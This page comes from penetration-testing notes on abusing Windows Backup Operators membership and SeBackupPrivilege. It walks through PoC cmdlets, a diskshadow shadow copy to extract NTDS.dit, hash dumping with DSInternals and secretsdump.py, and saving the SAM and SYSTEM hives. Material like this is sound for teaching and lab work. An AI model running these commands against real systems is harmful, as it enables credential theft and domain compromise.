Backup Operators

Membership of this group grants its members the SeBackup and SeRestore

SeBackup

SeBackupPrivilege iallows a user to bypass file and directory permission checks to perform backups. When granted, a user can read all files, regardless of the ACLs set on them, for backup purposes.

We can't do this using the standard copy command. We need to programmatically copy the data, making sure to specify the FILE_FLAG_BACKUP_SEMANTICS flag.

The FILE_FLAG_BACKUP_SEMANTICS specify that the file is being opened or created for a backup or restore operation.

If a folder or file has an explicit deny entry for our current user or a group they belong to, this will prevent us from accessing it, even if the FILE_FLAG_BACKUP_SEMANTICS flag is specified.

POC

We use this POC for the attack => https://github.com/giuliano108/SeBackupPrivilege/tree/master/SeBackupPrivilegeCmdLets/bin/Debug

Both .dll must be transfered to the target.

Launching the attack

First import the librairies from the POC

Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll

Then verifiy if SeBackup is enabled

whoami /priv #cmd
Get-SeBackupPrivilege # powershell

If not we enable it

Set-SeBackupPrivilege

From there we have different attack options

A) Copying a protected file

Copy-FileSeBackupPrivilege C:\secrets\creds.txt .\creds.txt

B) Attacking a DC - Copying NTDS.dit

This applies only in Active Directory context.

We can attempt to copy the DC database which contains all the users NTLM hashed passwords. We can't copy it with Copy-FileSeBackupPrivilege because the file is locked.

We can use the Windows diskshadow utility to create a shadow copy of the C drive and expose it as E drive. The NTDS.dit in this shadow copy won't be in use by the system.

PS C:\hacker> diskshadow.exe

Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer:  DC,  10/14/2020 12:57:52 AM

DISKSHADOW> set verbose on
DISKSHADOW> set metadata C:\Windows\Temp\meta.cab
DISKSHADOW> set context clientaccessible
DISKSHADOW> set context persistent
DISKSHADOW> begin backup
DISKSHADOW> add volume C: alias cdrive
DISKSHADOW> create
DISKSHADOW> expose %cdrive% E:
DISKSHADOW> end backup
DISKSHADOW> exit

PS C:\htb> dir E:


    Directory: E:\


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         5/6/2021   1:00 PM                Confidential
d-----        9/15/2018  12:19 AM                PerfLogs
d-r---        3/24/2021   6:20 PM                Program Files
d-----        9/15/2018   2:06 AM                Program Files (x86)
d-----         5/6/2021   1:05 PM                Tools
d-r---         5/6/2021  12:51 PM                Users
d-----        3/24/2021   6:38 PM                Windows

Next, we can use the Copy-FileSeBackupPrivilege cmdlet to bypass the ACL and copy the NTDS.dit locally.

Copy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit C:\Tools\ntds.dit

Now we can use a tool likesecretsdump.py or the PowerShell DSInternals module to extract all Active Directory account credentials. Here we focus on the Administrator user:

With DSInternals:

PS C:\hacker> Import-Module .\DSInternals.psd1
PS C:\hacker> $key = Get-BootKey -SystemHivePath .\SYSTEM
PS C:\hacker> Get-ADDBAccount -DistinguishedName 'CN=administrator,CN=users,DC=inlanefreight,DC=local' -DBPath .\ntds.dit -BootKey $key

With secretdumps.py:

secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL

C) Attacking Local Windows - Backing up SAM and SYSTEM Registry Hives

We can back up the SAM and SYSTEM registry hives to extract local account credentials offline using a tool such as Impacket's secretsdump.py

First we backup the hives

reg save HKLM\SYSTEM SYSTEM.SAV
reg save HKLM\SAM SAM.SAV

D) Copying protected files with robocopy

It's less common, but we can also leverage robocopy to copy files in backup mode:

robocopy /B C:\secrets .\hacker_folder creds.txt

/B: Runs in "Backup mode." Allows Robocopy to bypass file and folder permission checks because of SeBackupPrivilege
C:\secrets\creds.txt: Source directory
.\hacker_folder: Destination directory
creds.txt: Specifies to only backup this file from the source directory

Previous3 - Attack Group Privileges NextEvent Log Readers

Last updated 2 years ago